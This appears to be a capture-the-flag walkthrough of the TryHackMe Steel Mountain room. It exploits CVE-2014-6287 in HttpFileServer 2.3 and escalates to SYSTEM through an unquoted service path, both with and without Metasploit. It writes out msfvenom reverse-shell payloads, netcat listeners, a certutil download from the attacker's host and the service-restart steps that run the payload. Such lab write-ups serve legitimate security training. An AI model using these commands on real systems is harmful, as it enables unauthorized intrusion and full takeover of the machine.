TryHackMe Walkthrough: Steel Mountain (with &without Metasploit)

This room is a box hosting two web services, and one of them is hosting a vulnerable service. We are able to use an exploit to achieve remote code execution. After an initial shell, winPEAS shows we are able to use an unquoted service path vulnerability to escalate to nt authority\system.

This room can be completed with and without Metasploit. First, I will use Metasploit, then use public exploit code to recreate the same process.

You can find this room at https://tryhackme.com/room/steelmountain

First, we start with some recon. After running a basic nmap, we can see there are 12 ports open.

nmap -A -vv -oA reconbasic 10.10.22.135

nmap results

After further review, we can also see there is a web server running on port 8080. After navigating to http://10.10.22.135:8080, we can see it is running HttpFileServer 2.3

HttpFileServer running on port 8080

After a little research, HttpFileServer 2.3 is vulnerable to CVE-2014-6287 which is a remote code execution. This has a Metasploit module which we can leverage. After opening the msfconsole, we need to find and set up the exploit. First, search 2014–6287 to find the exploit. Then, use 0 to select the exploit.

searching for the exploit

Once the exploit is selected, we need to set up some options. Using the command options we can get a list of what we need to change. In this case, we’ll need to change the RHOSTS and RPORT.

set RHOSTS 10.10.22.135
set RPORT 8080

Once the options are set, use the command run and you should receive a meterpreter shell.

meterpreter shell

After a little bit of searching, we can find the user.txt flag at C:\Users\bill\Desktop\user.txt

user.txt flag

Now that we have the initial shell, we need to find a way to escalate privileges. Using the meterpreter command upload /root/Desktop/PEASS/winPEAS/winPEASexe/winPEAS/bin/Obfuscated Releases/winPEASany.exe we can upload winPEAS from our local machine to the remote machine. To run this script, we first need to use the command load powershell then powershell_shell to get into the PS shell. From there, we can use the command . .\WinPEASany.exe to run the privilege escalation enumeration tool. After running winPEAS, we can find some paths to escalate. The creator of this box expected us to use the Advanced SystemCare Service unquoted paths vulnerability.

Unquoted paths

First, we need to understand what the unquoted path vulnerability is. An unquoted path vulnerability stems from a flaw in how the Microsoft API handles file paths while launching services. For example, if there is a service at C:\Program Files\Cool Service\Service.exe, Windows will attempt to launch the following services in this order because of the spacing. If it doesn’t exist, it will move on to the next one:

• C:\Program.exe
• C:\Program Files\Cool.exe
• C:\Program Files\Cool Service\Service.exe

More information can be found in Jeff Liford’s blog post: http://www.ryanandjeffshow.com/blog/2013/04/05/the-microsoft-windows-unquoted-service-path-vulnerability/

Now, to exploit this, we will need to use the path C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe Using the example above as a guide, we need to create a program at either of the following paths to run:

• C:\Program.exe
• C:\Program Files (x86)\IObit\Advanced.exe

This means we will have to put our Advanced.exe file in C:\Program Files (x86)/IObit/ directory.

Using msfvenom, I generated a reverse shell and started a listener on port 4444.

msfvenom -p windows/reverse_tcp LHOST=10.10.182.72 LPORT=4444 -fexe -o Advanced.exe
nc -lvnp 4444

On the victim box, we need to stop the service, upload the shell, and start the service again. First, sc stop AdvancedSystemCareService9.

stopping the service

Then, use the Meterpreter shell to upload /root/Advanced.exe to the victim box.

uploading Advanced.exe

Now, we need to start the service again using sc start AdvancedSystemCare9 in a normal shell. Once started, check your listener and you should have a shell opened as nt authority\system!

shell as nt authority\system

Now, a little searching and you can retrieve the root.txt contents.

root.txt file

Without Metasploit

This box can be done without the use of Metasploit using the exploit code for the same CVE-2014–6287. Using Searchsploit, we find that there is a Python RCE at and it can be copied to our path using the command searchsploit -m 39161.py

searchsploit

Now we have the exploit code. Looking at it, we need to do a few things to get set up.

• The usage shows we need to be running a web server hosting netcat. Kali has a copy of nc.exe in /usr/share/windows-binaries. Then we can host this by using python: python -m SimpleHTTPServer 80

• The code shows we need to change the local IP and the port we will be listening on:

Once these are changed, opened a listener, and we’re hosting nc.exe, we’re ready to go!

python 39161.py 10.10.0.27 8080

initial shell

Now that we have the initial shell again, we will use the same unquoted service path vulnerability to escalate. Since we already know the vulnerability, we don’t need to rerun winPEAS. Using msfvenom, we can generate another Advanced.exe shell(if necessary) and upload it using the python simple server.

msfvenom -p windows/reverse_tcp LHOST=10.10.182.72 LPORT=4444 -fexe -o Advanced.exe
Python -m SimpleHttpServer

Once we are hosting Advanced.exe, we need to use the certutil.exe service to get the file from our local system.

certutil.exe -urlcache -split -f http://10.10.182.72:8000/Advanced.exe

Now the Advanced.exe file is on the system, open another listener and then use the following commands to start and stop the service again to get the nt authority\system shell.

sc stop AdvancedSystemCareService9
sc start AdvancedSystemCareService9

nt authority/system without metasploit